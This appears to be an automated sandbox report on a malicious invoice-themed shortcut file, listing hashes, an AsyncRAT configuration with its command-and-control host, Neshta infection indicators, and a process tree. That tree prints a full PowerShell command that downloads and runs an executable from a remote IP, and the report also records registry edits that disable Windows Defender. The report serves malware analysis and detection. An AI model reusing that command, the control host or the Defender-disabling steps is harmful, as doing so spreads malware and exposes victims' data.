Analysis
-
max time kernel
141s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
resource tags
arch:x64arch:x86image:win10v2004-20220414-enlocale:en-usos:windows10-2004-x64system -
submitted
19-07-2022 14:46
Static task
static1
Behavioral task
behavioral1
Sample
FACTURE_.lnk
Resource
win7-20220718-en
General
-
Target
FACTURE_.lnk
-
Size
1012B
-
MD5
60cddf458ccce0249bc3654f282f7b2e
-
SHA1
19a6ab379f925509d7cc36524c716877f4a268a0
-
SHA256
b0cf721309f7ea1684e2593a3e3c98f080146274432f39c9e2d2982ba1c9da95
-
SHA512
cd86c8e423ad3eaad92e67241896976c5e02ecea5d0c2dafef08e17eb6786fae0682d5bd0e59897b06faf06a3cef4a3883c03331c450574ae753bba6477bda91
Malware Config
Extracted
asyncrat
0.5.7B
Default
secureyourdataarea1.duckdns.org:56390
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
svchost.exe
-
install_folder
%AppData%
Signatures
-
Detect Neshta payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\file.exe family_neshta C:\Users\Admin\AppData\Local\Temp\file.exe family_neshta -
Processes:
file.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" file.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" file.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
file.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" file.exe -
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/772-145-0x0000000000610000-0x0000000000622000-memory.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 3204 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
file.exefile.exefile.exepid process 4240 file.exe 4524 file.exe 772 file.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exefile.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation file.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
file.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" file.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features file.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
file.exedescription pid process target process PID 4524 set thread context of 772 4524 file.exe file.exe -
Drops file in Program Files directory 64 IoCs
Processes:
file.exedescription ioc process File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe file.exe File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE file.exe File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe file.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE file.exe File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE file.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13157~1.61\MICROS~2.EXE file.exe File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE file.exe File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE file.exe File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe file.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE file.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE file.exe File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe file.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe file.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXE file.exe File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe file.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13157~1.61\MICROS~1.EXE file.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe file.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe file.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe file.exe File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe file.exe File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE file.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE file.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE file.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13157~1.61\MICROS~3.EXE file.exe File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe file.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXE file.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13157~1.61\MICROS~1.EXE file.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13157~1.61\MI391D~1.EXE file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE file.exe File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe file.exe File opened for modification C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe file.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE file.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE file.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13157~1.61\MICROS~4.EXE file.exe File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE file.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe file.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe file.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13157~1.61\MI9C33~1.EXE file.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXE file.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE file.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE file.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe file.exe File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE file.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe file.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe file.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE file.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE file.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe file.exe File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE file.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe file.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~4.EXE file.exe -
Drops file in Windows directory 1 IoCs
Processes:
file.exedescription ioc process File opened for modification C:\Windows\svchost.com file.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
file.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" file.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 3204 powershell.exe 3204 powershell.exe 3792 powershell.exe 3792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exefile.exefile.exepowershell.exedescription pid process Token: SeDebugPrivilege 3204 powershell.exe Token: SeDebugPrivilege 4524 file.exe Token: SeDebugPrivilege 772 file.exe Token: SeDebugPrivilege 3792 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
cmd.exepowershell.exefile.exefile.exefile.exedescription pid process target process PID 2644 wrote to memory of 3204 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 3204 2644 cmd.exe powershell.exe PID 3204 wrote to memory of 4240 3204 powershell.exe file.exe PID 3204 wrote to memory of 4240 3204 powershell.exe file.exe PID 3204 wrote to memory of 4240 3204 powershell.exe file.exe PID 4240 wrote to memory of 4524 4240 file.exe file.exe PID 4240 wrote to memory of 4524 4240 file.exe file.exe PID 4240 wrote to memory of 4524 4240 file.exe file.exe PID 4524 wrote to memory of 772 4524 file.exe file.exe PID 4524 wrote to memory of 772 4524 file.exe file.exe PID 4524 wrote to memory of 772 4524 file.exe file.exe PID 4524 wrote to memory of 772 4524 file.exe file.exe PID 4524 wrote to memory of 772 4524 file.exe file.exe PID 4524 wrote to memory of 772 4524 file.exe file.exe PID 4524 wrote to memory of 772 4524 file.exe file.exe PID 4524 wrote to memory of 772 4524 file.exe file.exe PID 772 wrote to memory of 3792 772 file.exe powershell.exe PID 772 wrote to memory of 3792 772 file.exe powershell.exe PID 772 wrote to memory of 3792 772 file.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\FACTURE_.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri 'http://52.149.215.0/svchost.exe' -OutFile $env:temp\file.exe; set a=ec; start $env:temp\file.exe2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"3⤵
- Modifies system executable filetype association
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Users\Admin\AppData\Local\Temp\3582-490\file.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\file.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Users\Admin\AppData\Local\Temp\3582-490\file.exe05⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d5a6408e58a8e6cdcac441b2724bdeea
SHA1c32347262903a5db5422c41c280fe975731155a1
SHA2566927aa1bd6f5b470b786b77ac7deac1ac4afcfa7650bc5c72358b3e8462e32d3
SHA512f630fa6616ed5aeb1c875f1573de5ca3db917ff6b2d5cb8d3da37ae9e45104a8ebf46b2504d1281b9d3b6705bbf3422c9b40c20b64417ef932c68b314e3aee14
-
Filesize
438KB
MD561f89c90f92b2579d100f2af29f8375b
SHA194b645443699532b764963a6340dc2001de78146
SHA256531a2ee7e49f863969f2e353cfc0d62117d4857c9cf3784fa387c72a9911b757
SHA512fadb57106257333e6e34de9f7a47ca99b1aa628ddb4d973b088a66e3d7d7dda339a680204671bedf96aab68adaeb3797f82c06743dd550eb71d3f850e4214715
-
Filesize
438KB
MD561f89c90f92b2579d100f2af29f8375b
SHA194b645443699532b764963a6340dc2001de78146
SHA256531a2ee7e49f863969f2e353cfc0d62117d4857c9cf3784fa387c72a9911b757
SHA512fadb57106257333e6e34de9f7a47ca99b1aa628ddb4d973b088a66e3d7d7dda339a680204671bedf96aab68adaeb3797f82c06743dd550eb71d3f850e4214715
-
Filesize
438KB
MD561f89c90f92b2579d100f2af29f8375b
SHA194b645443699532b764963a6340dc2001de78146
SHA256531a2ee7e49f863969f2e353cfc0d62117d4857c9cf3784fa387c72a9911b757
SHA512fadb57106257333e6e34de9f7a47ca99b1aa628ddb4d973b088a66e3d7d7dda339a680204671bedf96aab68adaeb3797f82c06743dd550eb71d3f850e4214715
-
Filesize
479KB
MD54c6b01344809054252095695fe24aa5f
SHA1d1571b19723ebb0def5a71b7d977ef4c5bdb66ab
SHA256b20bdd03ad605edafccbed9cbf281d1fd370116dd07e335fc2f428e9efb2863b
SHA512a26600e8233e90034a3a731246bdc634bc30478ea995c37317ef2e8139200f09446c4b78b500ffec5d7a84045790d0e80d20e4ba58cf28f0e4358f80e1db3af0
-
Filesize
479KB
MD54c6b01344809054252095695fe24aa5f
SHA1d1571b19723ebb0def5a71b7d977ef4c5bdb66ab
SHA256b20bdd03ad605edafccbed9cbf281d1fd370116dd07e335fc2f428e9efb2863b
SHA512a26600e8233e90034a3a731246bdc634bc30478ea995c37317ef2e8139200f09446c4b78b500ffec5d7a84045790d0e80d20e4ba58cf28f0e4358f80e1db3af0